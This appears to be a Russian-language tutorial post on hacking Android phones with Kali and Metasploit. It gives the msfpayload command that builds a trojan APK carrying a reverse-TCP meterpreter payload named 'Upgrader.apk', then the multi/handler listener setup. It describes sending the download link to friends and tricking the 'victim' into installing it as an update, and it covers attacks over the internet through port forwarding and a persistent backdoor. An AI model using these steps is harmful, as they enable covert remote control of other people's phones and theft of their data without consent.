full

//

Я не вижу учебников, объясняющих этот взлом/эксплойт, поэтому я сделал один. (Тем не менее, вы, возможно, уже знаете об этом).

Fire-Up Kali:

• Откройте терминал и создайте троянский файл .apk
• Вы можете сделать это, набрав:
  msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP)
• Вы также можете взломать android в WAN, то есть через Interet, используя ваш публичный/внешний IP-адрес в LHOST и переадресацию портов (спросите меня о переадресации портов, если у вас есть проблемы в разделе комментариев).

Откройте другой терминал:

• Откройте другой терминал, пока файл не будет создан.
• Загрузите консоль metasploit, набрав: msfconsole

Настройте слушателя.

После загрузки (это займет время) загрузите эксплойт с несколькими обработчиками, набрав: use exploit/multi/handler

Установите (обратную) полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp

Exploit!

Наконец наберите: exploit, чтобы запустить слушателя.

Скопируйте созданное вами приложение (Upgrader.apk) из корневой папки на телефон Android.

Затем отправьте его с помощью загрузки на Dropbox или любой другой веб-сайт (например, www.speedyshare.com).

Затем отправьте ссылку, которую Веб-сайт дал вам своим друзьям, и используйте их телефоны (только в локальной сети, но если вы использовали метод WAN, вы можете использовать эксплойт в любом месте в Интернете).

Пусть Victim установит приложение Upgrader (так как он думает, что оно предназначено для обновления некоторых функций на его телефоне)

Тем не менее, в настройках безопасности телефона Android должна быть включена опция разрешения на установку приложений из неизвестных источников (если нет), чтобы троянец мог выполнить установку.

И когда он нажимает кнопку Open...

BOOM!

Приходит приглашение метра:

Некоторые почтовые модули, которые работают для Windows, могут не работать в Android.
Например: запустить killav, постоянство (постоянный бэкдор) и т.д.